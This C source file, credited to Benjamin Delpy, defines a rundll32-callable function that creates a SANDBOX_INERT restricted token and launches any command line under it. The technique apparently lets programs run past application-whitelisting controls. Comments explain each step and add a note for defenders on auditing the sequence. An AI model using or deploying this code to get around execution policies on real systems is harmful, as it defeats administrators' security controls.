/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "utils.h"
/*
 * kappfree_startW - entry point whose signature (HWND, HINSTANCE, LPWSTR, int)
 * follows the rundll32 callback convention.
 *
 * Opens the calling process's own token, derives a restricted primary token
 * from it via CreateRestrictedToken with the SANDBOX_INERT flag and nothing
 * else removed (all SID/privilege counts are 0, all arrays NULL), and starts
 * lpszCmdLine under that token in a new console.  Each handle obtained along
 * the way is closed before returning; the child is not waited on.
 *
 * hwnd, hinst, nCmdShow: unused (kept for the callback signature).
 * lpszCmdLine: passed straight through as lpCommandLine to CreateProcessAsUser;
 *              the W variant may write into that buffer, so it must be writable.
 * Returns nothing; any failing step simply skips the rest (no GetLastError
 * reporting).
 *
 * Defender note: a primary token produced with SANDBOX_INERT and immediately
 * consumed by CreateProcessAsUser is a compact sequence worth covering in
 * token-creation / process-creation auditing.
 */
void CALLBACK kappfree_startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow)
{
	HANDLE hProcessToken = NULL;
	HANDLE hRestrictedToken = NULL;
	PROCESS_INFORMATION procInfo;
	STARTUPINFO startInfo;

	(void)hwnd;
	(void)hinst;
	(void)nCmdShow;

	RtlZeroMemory(&procInfo, sizeof procInfo);
	RtlZeroMemory(&startInfo, sizeof startInfo);
	startInfo.cb = sizeof startInfo; /* CreateProcess* requires cb to carry the struct size */

	if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY, &hProcessToken))
		goto done;

	if(!CreateRestrictedToken(hProcessToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &hRestrictedToken))
		goto close_process_token;

	if(CreateProcessAsUser(hRestrictedToken, NULL, lpszCmdLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &startInfo, &procInfo))
	{
		/* Thread handle first, then process handle - same release order as before. */
		CloseHandle(procInfo.hThread);
		CloseHandle(procInfo.hProcess);
	}
	CloseHandle(hRestrictedToken);

close_process_token:
	CloseHandle(hProcessToken);
done:
	return;
}